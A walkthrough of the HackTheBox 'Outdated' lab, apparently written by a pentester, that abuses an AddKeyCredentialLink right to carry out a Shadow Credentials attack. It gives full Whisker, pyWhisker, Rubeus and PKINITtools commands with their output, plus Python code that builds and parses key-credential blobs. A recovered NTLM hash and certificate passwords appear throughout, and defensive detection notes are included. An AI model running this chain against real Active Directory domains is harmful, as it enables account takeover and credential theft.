AddKeyCredentialLink


During the BloodHound session, it was identified that the btables user holds a transitive AddKeyCredentialLink privilege over the sflowers user. This grants the ability to write to the msDS-KeyCredentialLink attribute of the sflowers user, which is the precondition for a Shadow Credentials attack.

This can be verified remotely, since msDS-KeyCredentialLink is an LDAP attribute and the ACE that grants the right lives in the target object's nTSecurityDescriptor, which is itself readable over LDAP.

Confirmation


┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ echo -e '[realms]\n\n\tOUTDATED.HTB = {\n\t\tkdc = dc.outdated.htb\n\t}' | sudo tee /etc/krb5.conf
[sudo] password for kali: 
[realms]
 
	OUTDATED.HTB = {
		kdc = dc.outdated.htb
	}

First, I configure /etc/krb5.conf locally so that tools can authenticate to dc.outdated.htb with Kerberos, using the btables ticket already in the credential cache.

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ KRB5CCNAME=btables@dc.outdated.htb.ccache bloodyAD -d OUTDATED.HTB -k --host dc.outdated.htb get search 'CN=SUSAN FLOWERS,CN=USERS,DC=OUTDATED,DC=HTB' --resolve-sd | grep -i ITStaff        
nTSecurityDescriptor.ACL.2.Trustee: ITStaff
nTSecurityDescriptor.ACL.9.Trustee: ITStaff

There are two ACEs in the DACL of the sflowers object whose trustee is the ITStaff group. The BloodHound edge is transitive, so the privilege reaches btables through that group membership.

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ KRB5CCNAME=btables@dc.outdated.htb.ccache bloodyAD -d OUTDATED.HTB -k --host dc.outdated.htb get search 'CN=SUSAN FLOWERS,CN=USERS,DC=OUTDATED,DC=HTB' --resolve-sd | grep -w nTSecurityDescriptor.ACL.2 
nTSecurityDescriptor.ACL.2.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.2.Trustee: ITStaff
nTSecurityDescriptor.ACL.2.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.2.ObjectType: ms-DS-Key-Credential-Link

This is the relevant one: an ALLOWED_OBJECT ACE granting the ITStaff group WRITE_PROP and READ_PROP scoped to the ms-DS-Key-Credential-Link attribute, which is exactly what BloodHound reports as AddKeyCredentialLink.
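To show what bloodyAD's --resolve-sd did under the hood, here is an added example (my own code, not part of bloodyAD or BloodHound) that decodes a self-relative security descriptor as returned in the nTSecurityDescriptor LDAP attribute, walks the DACL, and lists every trustee whose ACE can write msDS-KeyCredentialLink, either through an object-specific WriteProperty ACE carrying the attribute's schemaIDGUID (5b47d60f-6090-40b2-9f37-2a4de88f3063, the GUID bloodyAD resolved to ms-DS-Key-Credential-Link) or through a broader right such as GenericAll. Since there is no domain to talk to here, the descriptor is constructed inside the block with a fictitious domain SID and RIDs; on a real run the bytes come from an LDAP search for nTSecurityDescriptor with the SD flags control set to DACL only (0x04), which is what lets a non-privileged user such as btables read the DACL without the SACL.

```python
import struct
import uuid

# schemaIDGUID of msDS-KeyCredentialLink: the ObjectType an object-specific ACE carries
MSDS_KEYCREDENTIALLINK = uuid.UUID("5b47d60f-6090-40b2-9f37-2a4de88f3063")

ACCESS_ALLOWED_ACE, ACCESS_DENIED_ACE = 0x00, 0x01
ACCESS_ALLOWED_OBJECT_ACE, ACCESS_DENIED_OBJECT_ACE = 0x05, 0x06
OBJECT_ACE_TYPES = (ACCESS_ALLOWED_OBJECT_ACE, ACCESS_DENIED_OBJECT_ACE)
ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x1, 0x2
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000

# Access-mask bits that matter for this check (ADS_RIGHT_DS_* and generic/standard rights)
READ_PROP, WRITE_PROP = 0x10, 0x20
WRITE_DAC, WRITE_OWNER = 0x00040000, 0x00080000
GENERIC_ALL, GENERIC_WRITE = 0x10000000, 0x40000000

def sid_to_str(buf):
    rev, count = buf[0], buf[1]
    auth = int.from_bytes(buf[2:8], "big")           # IdentifierAuthority is big-endian
    subs = struct.unpack_from("<%dI" % count, buf, 8)  # sub-authorities are little-endian
    return "S-%d-%d%s" % (rev, auth, "".join("-%d" % s for s in subs))

def sid_from_str(sid):
    p = sid.split("-")
    subs = [int(x) for x in p[3:]]
    return bytes([int(p[1]), len(subs)]) + int(p[2]).to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def parse_dacl(sd):
    """Walk the DACL of a self-relative SECURITY_DESCRIPTOR and return one dict per ACE."""
    control, off_dacl = struct.unpack_from("<H", sd, 2)[0], struct.unpack_from("<I", sd, 16)[0]
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []                       # NULL DACL: nothing to enumerate
    ace_count = struct.unpack_from("<H", sd, off_dacl + 4)[0]
    pos, aces = off_dacl + 8, []        # ACL header is 8 bytes, ACEs follow
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        body = sd[pos + 4:pos + ace_size]
        mask, cursor, object_type = struct.unpack_from("<I", body, 0)[0], 4, None
        if ace_type in OBJECT_ACE_TYPES:
            obj_flags, cursor = struct.unpack_from("<I", body, 4)[0], 8
            if obj_flags & ACE_OBJECT_TYPE_PRESENT:
                object_type = uuid.UUID(bytes_le=body[cursor:cursor + 16])  # mixed-endian GUID
                cursor += 16
            if obj_flags & ACE_INHERITED_OBJECT_TYPE_PRESENT:
                cursor += 16            # InheritedObjectType is irrelevant here, skip it
        aces.append({"type": ace_type, "flags": ace_flags, "mask": mask,
                     "object_type": object_type, "trustee": sid_to_str(body[cursor:])})
        pos += ace_size
    return aces

def key_credential_link_writers(sd):
    """Trustees whose allow ACE lets them write msDS-KeyCredentialLink, with the right that grants it."""
    hits = []
    for ace in parse_dacl(sd):
        if ace["type"] not in (ACCESS_ALLOWED_ACE, ACCESS_ALLOWED_OBJECT_ACE):
            continue                    # deny and audit ACEs never grant anything
        m = ace["mask"]
        if m & GENERIC_ALL:
            hits.append((ace["trustee"], "GenericAll"))
        elif m & GENERIC_WRITE:
            hits.append((ace["trustee"], "GenericWrite"))
        elif m & (WRITE_DAC | WRITE_OWNER):
            hits.append((ace["trustee"], "WriteDacl/WriteOwner (can grant itself the right)"))
        elif m & WRITE_PROP and ace["object_type"] is None:
            hits.append((ace["trustee"], "WriteProperty on all attributes"))
        elif m & WRITE_PROP and ace["object_type"] == MSDS_KEYCREDENTIALLINK:
            hits.append((ace["trustee"], "WriteProperty on msDS-KeyCredentialLink"))
    return hits   # property-set GUIDs are not expanded; deny precedence is not evaluated

def build_sd(aces):
    """Assemble a self-relative SD with only a DACL; aces = (type, mask, object GUID or None, SID string)."""
    raw = b""
    for ace_type, mask, guid, sid in aces:
        body = struct.pack("<I", mask)
        if ace_type in OBJECT_ACE_TYPES:
            body += struct.pack("<I", ACE_OBJECT_TYPE_PRESENT if guid else 0) + (guid.bytes_le if guid else b"")
        body += sid_from_str(sid)
        raw += struct.pack("<BBH", ace_type, 0, 4 + len(body)) + body
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(raw), len(aces), 0) + raw   # AclRevision 4 = ACL_REVISION_DS
    return struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, 20) + acl

# Constructed sample (fictitious domain SID): a group at RID 1104 standing in for ITStaff gets
# WRITE_PROP|READ_PROP scoped to the msDS-KeyCredentialLink GUID (what bloodyAD printed as ACL entry 2),
# Domain Admins (RID 512) get GenericAll, Everyone can only read, and a deny ACE must not count as a writer.
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_SD = build_sd([
    (ACCESS_ALLOWED_ACE, READ_PROP, None, "S-1-1-0"),
    (ACCESS_ALLOWED_OBJECT_ACE, WRITE_PROP | READ_PROP, MSDS_KEYCREDENTIALLINK, DOMAIN + "-1104"),
    (ACCESS_DENIED_OBJECT_ACE, WRITE_PROP, MSDS_KEYCREDENTIALLINK, DOMAIN + "-1105"),
    (ACCESS_ALLOWED_ACE, GENERIC_ALL, None, DOMAIN + "-512"),
])

if __name__ == "__main__":
    for trustee, how in key_credential_link_writers(SAMPLE_SD):
        print("%s can write msDS-KeyCredentialLink via %s" % (trustee, how))
```

Mapping the returned SIDs back to names such as ITStaff is a separate objectSid lookup, which is the part bloodyAD's --resolve-sd adds on top of this decoding. The check deliberately stays conservative on the deny side and does not expand property-set GUIDs, so a WriteProperty granted on a property set containing msDS-KeyCredentialLink would go unreported.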

Shadow Credentials


The Shadow Credentials attack abuses the Key Trust model in Active Directory by adding an attacker-controlled key pair as an alternative credential on a user or computer account, stored in its msDS-KeyCredentialLink attribute. With the matching private key, the attacker authenticates through PKINIT to obtain a Ticket Granting Ticket (TGT) and then, through a User-to-User (U2U) request, recovers the NTLM hash of the targeted user or computer from the ticket's PAC. The added Shadow Credentials persist even after the user or computer changes its password. For computer objects, abuse requires additional steps, such as forging an RC4 silver ticket or using the TGT to impersonate privileged users through S4U2Self, with modifications to the resulting Service Ticket. Notably, this technique does not delegate access to another account, so exposure is limited to the private key generated by the attacker, and it avoids creating computer accounts, which can be hard to clean up, until privilege escalation is achieved.

In order for this attack to work, the following requirements must be met:

  • At least one Windows Server 2016 Domain Controller
  • A digital certificate for Server Authentication installed on the Domain Controller, so that the DC can perform PKINIT
    • ADCS is up and running on the dc.outdated.htb host, with the CA installed on that same host
  • Windows Server 2016 Functional Level in Active Directory
  • A compromised account with delegated rights to write to the msDS-KeyCredentialLink attribute of the target object (here btables, via the ITStaff group)

The original author (Elad Shamir) developed a dedicated tool, Whisker, and there is also a Python implementation of it, pyWhisker, which can be run remotely against LDAP.

I will be trying out both:

  • Whisker (https://github.com/eladshamir/Whisker)
  • pyWhisker (https://github.com/ShutdownRepo/pywhisker)

Whisker


Since there is no pre-compiled binary available, I need to compile one myself.

By default, the project targets .NET Framework 4.7.2. The client.outdated.htb host has .NET 4.8.04084 installed, and 4.8 runs 4.7.2 assemblies unchanged, so I can compile the project as is.

PS C:\Users\btables\Documents> \\10.10.14.23\smb\Whisker.exe --help
 
Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their 
msDS-KeyCredentialLink attribute, effectively adding Shadow Credentials to the target account.
 
  Usage: ./Whisker.exe [list|add|remove|clear] /target:<samAccountName> [/deviceID:<GUID>] [/domain:<FQDN>]
               [/dc:<IP/HOSTNAME>] [/password:<PASWORD>] [/path:<PATH>] 
 
  Modes 
    list            List all the values of the the msDS-KeyCredentialLink attribute of a target object
    add             Add a new value to the msDS-KeyCredentialLink attribute of a target object
    remove          Remove a value from the msDS-KeyCredentialLink attribute of a target object
    clear           Clear all the values of the the msDS-KeyCredentialLink attribute of a target object.
                    Warning: Clearing the msDS-KeyCredentialLink attribute of accounts configured for 
                    passwordless authentication will cause disruptions.
 
  Arguments:
    /target:<samAccountName>  Required. Set the target name. Computer objects should end with a '$' sign.
 
    /deviceID:<GUID>          [remove mode] Required in remove mode. Set the DeviceID of the value to remove from the
                              attribute msDS-KeyCredentialLink of the target object. Must be a valid GUID.  
 
    [/domain:<FQDN>]          Optional. Set the target Fully Qualified Domain Name (FQDN). If not provided, will try to
                              resolve the FQDN of the current user.
 
    [/dc:<IP/HOSTNAME>]       Optional. Set the target Domain Controller (DC). If not provided, will try to target the
                              Primary Domain Controller (PDC).
 
    [/password:<PASWORD>]     [add mode] Optional in add mode. Set the password for the stored self-signed certificate. 
                              If not provided, a random password will be generated.
 
    [/path:<PATH>]            [add mode] Optional in add mode. Set the path to store the generated self-signed certificate 
                              for authentication. If not provided, the certificate will be printed as a Base64 blob.
 
==[Examples]=========
 
  list    => Whisker.exe list /target:computername$ /domain:constoso.local /dc:dc1.contoso.local
  add     => Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1
  remove  => Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /deviceid:2de4643a-2e0b-438f-a99d-5cb058b3254b
  clear   => Whisker.exe clear /target:computername$ /domain:constoso.local /dc:dc1.contoso.local
 
For this attack to succeed, the environment must have a Domain Controller running at least Windows Server 2016,
and the Domain Controller must have a server authentication certificate to allow for PKINIT Kerberos authentication.
 
This tool is based on code from DSInternals by Michael Grafnetter (@MGrafnetter).

Now that the binary is compiled, I can run it straight from my SMB share (\\10.10.14.23\smb) on the client host, without dropping it to that host's disk.

PS C:\Users\btables\Documents> \\10.10.14.23\smb\Whisker.exe list /target:sflowers
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Listing deviced for sflowers:
[*] No entries!

No entries for now, so I will add one. No credentials need to be supplied, because Whisker acts in the security context of the current session, which is already established as btables over WinRM.

PS C:\Users\btables\Documents> \\10.10.14.23\smb\Whisker.exe add /target:sflowers
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password eeYeHxCmYp3MAxEK
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID faebf87a-5192-4a38-b016-496383c95541
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
 
Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"eeYeHxCmYp3MAxEK" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show

It successfully generated a self-signed certificate and a KeyCredential, wrote it to sflowers's msDS-KeyCredentialLink, and printed the exact Rubeus command to use. Now I can use Rubeus.exe to authenticate with that certificate and extract the NTLM hash.
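To make concrete what Whisker's add just wrote to sflowers (and what list, pyWhisker, or a defender's LDAP query reads back), here is an added example, my own code and not part of Whisker, pyWhisker or DSInternals, that builds and parses a KEYCREDENTIALLINK_BLOB as laid out in MS-ADTS and wraps it in the DN-with-Binary form stored in msDS-KeyCredentialLink. The RSA modulus is a constructed 2048-bit number, not a real key; the DeviceID reused is the one Whisker printed above; the CustomKeyInformation bytes (version 1, flags 0) and the timestamp are my assumptions; the object DN is the one from the Whisker output.

```python
import hashlib
import struct
import uuid

# KEYCREDENTIALLINK_ENTRY identifiers (MS-ADTS 2.2.20.6) and the values Whisker/pyWhisker write
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 0x01, 0x02, 0x03, 0x04, 0x05
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON_TS, CREATION_TIME = 0x06, 0x07, 0x08, 0x09
KCL_VERSION_2 = 0x00000200
KEY_USAGE_NGC = 0x01                  # Next Generation Credentials (Windows Hello / Key Trust)
KEY_SOURCE_AD = 0x00                  # key registered in AD
BCRYPT_RSAPUBLIC_MAGIC = 0x31415352   # "RSA1"
EPOCH_DIFF = 11644473600              # seconds between 1601-01-01 (FILETIME) and 1970-01-01

def rsa_public_to_bcrypt_blob(modulus, exponent=65537):
    """BCRYPT_RSAKEY_BLOB (public variant): little-endian header, then big-endian exponent and modulus."""
    exp = exponent.to_bytes((exponent.bit_length() + 7) // 8, "big")
    mod = modulus.to_bytes((modulus.bit_length() + 7) // 8, "big")
    return struct.pack("<IIIIII", BCRYPT_RSAPUBLIC_MAGIC, modulus.bit_length(),
                       len(exp), len(mod), 0, 0) + exp + mod

def unix_to_filetime(ts):
    return int((ts + EPOCH_DIFF) * 10_000_000)

def _entry(ident, value):
    # KEYCREDENTIALLINK_ENTRY: Length (2 bytes LE), Identifier (1 byte), Value
    return struct.pack("<HB", len(value), ident) + value

def build_key_credential(public_key_blob, device_id, created):
    """Assemble a version-2 KEYCREDENTIALLINK_BLOB for an NGC key sourced from AD."""
    ft = struct.pack("<Q", unix_to_filetime(created))
    tail = (_entry(KEY_MATERIAL, public_key_blob)
            + _entry(KEY_USAGE, bytes([KEY_USAGE_NGC]))
            + _entry(KEY_SOURCE, bytes([KEY_SOURCE_AD]))
            + _entry(DEVICE_ID, device_id.bytes_le)
            + _entry(CUSTOM_KEY_INFO, bytes([1, 0]))      # assumed: version 1, no flags
            + _entry(LAST_LOGON_TS, ft)
            + _entry(CREATION_TIME, ft))
    key_id = hashlib.sha256(public_key_blob).digest()     # KeyID = SHA256(KeyMaterial) in version 2
    key_hash = hashlib.sha256(tail).digest()              # KeyHash covers every entry after itself
    return struct.pack("<I", KCL_VERSION_2) + _entry(KEY_ID, key_id) + _entry(KEY_HASH, key_hash) + tail

def to_dn_binary(blob, owner_dn):
    """DN-with-Binary syntax as stored in msDS-KeyCredentialLink: B:<hex char count>:<hex>:<DN>."""
    hexstr = blob.hex().upper()
    return "B:%d:%s:%s" % (len(hexstr), hexstr, owner_dn)

def parse_key_credential(dn_binary):
    """Decode one msDS-KeyCredentialLink value and verify its two integrity hashes."""
    _, count, hexstr, owner_dn = dn_binary.split(":", 3)
    if int(count) != len(hexstr):
        raise ValueError("DN-Binary length field does not match payload")
    blob = bytes.fromhex(hexstr)
    version = struct.unpack_from("<I", blob, 0)[0]
    pos, entries = 4, {}
    while pos < len(blob):
        length, ident = struct.unpack_from("<HB", blob, pos)
        entries[ident] = (pos, blob[pos + 3:pos + 3 + length])
        pos += 3 + length
    key_hash_pos, key_hash = entries[KEY_HASH]
    after_hash = blob[key_hash_pos + 3 + len(key_hash):]
    material = entries[KEY_MATERIAL][1]
    return {
        "version": version,
        "owner_dn": owner_dn,
        "device_id": str(uuid.UUID(bytes_le=entries[DEVICE_ID][1])),
        "key_usage": entries[KEY_USAGE][1][0],
        "key_source": entries[KEY_SOURCE][1][0],
        "modulus_bits": struct.unpack_from("<I", material, 4)[0],
        "created": struct.unpack("<Q", entries[CREATION_TIME][1])[0] / 10_000_000 - EPOCH_DIFF,
        "key_id_ok": entries[KEY_ID][1] == hashlib.sha256(material).digest(),
        "key_hash_ok": key_hash == hashlib.sha256(after_hash).digest(),
    }

# Constructed sample input: a 2048-bit odd number standing in for an RSA modulus (NOT a real key),
# the DeviceID Whisker printed above, the target DN, and an arbitrary creation timestamp.
SAMPLE_MODULUS = int.from_bytes(hashlib.sha256(b"constructed sample").digest() * 8, "big") | (1 << 2047) | 1
SAMPLE_DEVICE_ID = uuid.UUID("faebf87a-5192-4a38-b016-496383c95541")
SAMPLE_DN = "CN=Susan Flowers,CN=Users,DC=outdated,DC=htb"
SAMPLE_CREATED = 1704518210

def sample_value():
    blob = build_key_credential(rsa_public_to_bcrypt_blob(SAMPLE_MODULUS), SAMPLE_DEVICE_ID, SAMPLE_CREATED)
    return to_dn_binary(blob, SAMPLE_DN)

if __name__ == "__main__":
    value = sample_value()
    print(value[:60] + "...")
    for k, v in parse_key_credential(value).items():
        print("%-13s %s" % (k, v))
```

The fields the parser pulls out are the ones worth watching on the defensive side: a KeyUsage of NGC on an account that has no Windows Hello device, a DeviceID nobody enrolled, and a KeyCreationTime that does not line up with any legitimate key registration. With directory service change auditing enabled, the write itself also surfaces as a 5136 event on msDS-KeyCredentialLink.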

Hashdump (Rubeus.exe)


PS C:\Users\btables\Documents> \\10.10.14.23\smb\Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"eeYeHxCmYp3MAxEK" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
 
   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
 
  v2.2.1 
 
[*] action: Ask TGT
 
[*] using pkinit with etype rc4_hmac and subject: CN=sflowers 
[*] building as-req (w/ pkinit preauth) for: 'outdated.htb\sflowers'
[*] using domain controller: 172.16.20.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
 
      doIF0jCCBc6gAwIBBaEDAgEWooIE5zCCBONhggTfMIIE26ADAgEFoQ4bDE9VVERBVEVELkhUQqIhMB+g
      AwIBAqEYMBYbBmtyYnRndBsMb3V0ZGF0ZWQuaHRio4IEnzCCBJugAwIBEqEDAgECooIEjQSCBIkTQZ2c
      3KK7Fol35e5251J+77lMR7FHwoCit7ecoYAGZ7VL0jdoEAeBjX6bVTKjO4xnueqpWEnVS1xlnBdLhzqf
      0gtVazR0BLRGiC5kont2TLJdkTdKC1od+lPPkHfwn4/3HCRyOWCeSI5gp11FY5j1vbuC+SUM1wsVe2xC
      B8luSD0EocjMTaJJ5tFzQ246zME6r0v4cCK1qzdyFElspjb9mm+daLpzP+lVlCSpVG3UX82gVfI8u+f2
      UOxzbGg3wwqFlngaeNwtKJvk9cWPmnO/+n8Sy57V6+VMKf8BHNpNdkQanjEVOLhz648MZ1ZbAyW+Jz+G
      quOQOEGJqNjI19m6hnERxKs1bKN6jOJ8ZXx9zbWQKq0/ejPhulb/m6WAYbu2S1kE5cZky69p2/IpFNbe
      htakxC9hgs1sci2ZeuZJuSBduV/jEaK554cglbYBnVLZNSrZMK4yR9qyy1L7US4Y75PxpxrE2vG69Kat
      yQI7aQG0hfYTz13q8ZdDT/ICeKGE/CqNVzejEEH0TJ1//GIJKu4gxwMePLNfqgrF/oosTe/ZPXI+YHg8
      odeUfCAsiAByjoF6/NGToKaRg4wxCT/zL9tc9mjuP/LOYSTMybLI2s0Uz2YJjPgAJbjzSK5wlthvYKxs
      VRFj1n9hLDN9uFNsGQV+tWp++CAuI6aV+Zvskpw2/grxnK3dc2c9+Do+Qyi41T1LF3GBRMtlMtxBOCM/
      l/sXfUYlfPtri24qKyfu5QYM6IS1QvrrVXJmHN9CNzNzKcObUa7+CKQUMxlL7TuMe1d+dcIvgNaPOfON
      cK4zdfyEprDs6JNl66rqt3d1eSvrcnz0Yk0JlMJHGXpf4cZVY0GgoxYBaFwmi9UHBFYE4sZYoDmdnFRw
      mONruyLbDQeAIHBZXPPUwNGT1ATXoeWnQHZBdDtgp3PF7gjInoYj9omHY+tJFTu9NsqCeo+Wl03gwDBB
      bPQ2f6rg7VztWrhEBhaX0F1ULa98e25T/Pl+oM74qYJTIoHkNKx/InzChn3L7cBiuh/rkKrJR8tKAxvb
      finQk5ZBG74Ps7rTBdtSC/enZjPhmAg4M533iNPaKcFI29kQ8a6msG4AwYfJAoGoZW6XFgLqxURxNmkG
      icruTNuPzcF71u+o95QZ7YBOjauGUfTG5d6fZW8YeozG+2ZvMNI42cpbiQoXFa2xmNeRf0jHTjEU9AcR
      BIgiXFqaDtp4Cy6g79nNp/lljMyAy9yjihnksZZN6KcUpQZMzO38G93RHPetQFVkQvtoz3CkFoS+5yZZ
      7dQfn1PJP6p2MSsfcNVRwrB/cd3yX9f6m61lb335Qrn+OBBMUfKBLnyBY3SnmLCqKKOLDESpMOvCsdRn
      MbEFfdDx4Fv+E9kl34pP2mL0S0yPSrzhAet0ZB5/5bGwEJJYjf7Y554jXLb2Zd1magJ1u25yxscPQE5j
      qENzNIOTCmdHxSsm7MLSqGI4arQACdn+tlRSoipnVF2Jm5iXE5XPKIolt8GmIWuQH6bkARla2dsAR3kN
      yORyCrRI5kLframvC+PTJVGjgdYwgdOgAwIBAKKBywSByH2BxTCBwqCBvzCBvDCBuaAbMBmgAwIBF6ES
      BBCNo77jdfswDOFiBdfglqmpoQ4bDE9VVERBVEVELkhUQqIVMBOgAwIBAaEMMAobCHNmbG93ZXJzowcD
      BQBA4QAApREYDzIwMjQwMTA2MDQxNjUwWqYRGA8yMDI0MDEwNjE0MTY1MFqnERgPMjAyNDAxMTMwNDE2
      NTBaqA4bDE9VVERBVEVELkhUQqkhMB+gAwIBAqEYMBYbBmtyYnRndBsMb3V0ZGF0ZWQuaHRi
 
  servicename              :  krbtgt/outdated.htb
  servicerealm             :  OUTDATED.HTB
  username                 :  sflowers
  userrealm                :  OUTDATED.HTB
  starttime                :  1/5/2024 8:16:50 PM
  endtime                  :  1/6/2024 6:16:50 AM
  renewtill                :  1/12/2024 8:16:50 PM
  flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  keytype                  :  rc4_hmac
  base64(key)              :  jaO+43X7MAzhYgXX4JapqQ==
  asrep (key)              :  6CF172BA51F7B5B981DBFF63715530D7
 
[*] Getting credentials using U2U
 
  credentialinfo         :
    version              : 0
    encryptiontype       : rc4_hmac
    credentialdata       :
      credentialcount    : 1
       ntlm              : 1FCDB1F6015DCB318CC77BB2BDA14DB5

Running Rubeus.exe from the SMB share in the same way, it authenticates as sflowers with the certificate over PKINIT, obtains a TGT, and with /getcredentials performs a U2U request to recover the NTLM hash from the ticket's PAC: 1FCDB1F6015DCB318CC77BB2BDA14DB5. Note that the TGT was requested with etype rc4_hmac, and on the DC this logon shows up as a 4768 event carrying certificate information rather than a password-based pre-authentication.

Validation


┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ impacket-getTGT OUTDATED.HTB/sflowers@dc.outdated.htb -hashes :1FCDB1F6015DCB318CC77BB2BDA14DB5 -k -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Saving ticket in sflowers@dc.outdated.htb.ccache

The hash is valid: impacket-getTGT obtained a TGT for sflowers with it and saved it to sflowers@dc.outdated.htb.ccache. Now that the sflowers user is fully compromised, I can connect directly to the DC host by leveraging the account's membership in the Remote Desktop Users group.

pyWhisker


┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ KRB5CCNAME=btables@dc.outdated.htb.ccache pywhisker.py -d OUTDATED.HTB -u btables --kerberos --no-pass --use-ldaps --dc-ip $IP -t sflowers --action list --verbose
[*] Searching for the target account
[*] target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

Using the TGT of the btables user, I can do the very same thing with pyWhisker over LDAPS. The list action reports the attribute as empty or unreadable, so I add a new entry.

┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ KRB5CCNAME=btables@dc.outdated.htb.ccache pywhisker.py -d OUTDATED.HTB -u btables --kerberos --no-pass --use-ldaps --dc-ip $IP -t sflowers --action add --verbose 
[*] Searching for the target account
[*] target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] keycredential generated with deviceid: f91b32be-637a-dee1-66b4-f58b8d8473b4
[*] Updating the msDS-KeyCredentialLink attribute of sflowers
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[verbose] no filename was provided. the certificate(s) will be stored with the filename: 9EfCfRfN
[verbose] no pass was provided. the certificate will be stored with the password: XDeBhRi3sezMezMfMWeI
[+] saved pfx (#pkcs12) certificate & key at path: 9EfCfRfN.pfx
[*] must be used with password: XDeBhRi3sezMezMfMWeI
[*] a tgt can now be obtained with https://github.com/dirkjanm/PKINITtools
[VERBOSE] Run the following command to obtain a TGT
[VERBOSE] python3 PKINITtools/gettgtpkinit.py -cert-pfx 9EfCfRfN.pfx -pfx-pass XDeBhRi3sezMezMfMWeI 
OUTDATED.HTB/sflowers 9EfCfRfN.ccache

It is done, and a PKCS#12 file holding the certificate and private key was written: 9EfCfRfN.pfx, protected with the password XDeBhRi3sezMezMfMWeI.

This time, I will use PKINITtools to turn the certificate into a TGT for sflowers.

Certificate to TGT (PKINITtools)


┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ python3 PKINITtools/gettgtpkinit.py OUTDATED.HTB/sflowers 2_sflowers@dc.outdated.htb.ccache -cert-pfx 9EfCfRfN.pfx -pfx-pass XDeBhRi3sezMezMfMWeI -dc-ip $IP
2024-01-06 05:32:45,615 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-01-06 05:32:45,625 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2024-01-06 05:32:54,232 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-01-06 05:32:54,232 minikerberos INFO     e6d6e56cad8698648f96a24032d38382558bd0a980c9d253925d3b85c0931567
INFO:minikerberos:e6d6e56cad8698648f96a24032d38382558bd0a980c9d253925d3b85c0931567
2024-01-06 05:32:54,234 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

I passed a different filename for the TGT to distinguish it from the one obtained earlier. The request succeeded and the TGT is saved for the sflowers user. The AS-REP encryption key printed above is what PKINITtools' getnthash.py would need to recover the NT hash from this ticket, the same U2U trick Rubeus performed with /getcredentials.

┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ ll 2_sflowers@dc.outdated.htb.ccache 
4.0K -rw-r--r-- 1 kali kali 1.5K Jan  6 05:40 2_sflowers@dc.outdated.htb.ccache

There it is

Now that the sflowers user is fully compromised, I can connect directly to the DC host by leveraging the account's membership in the Remote Desktop Users group.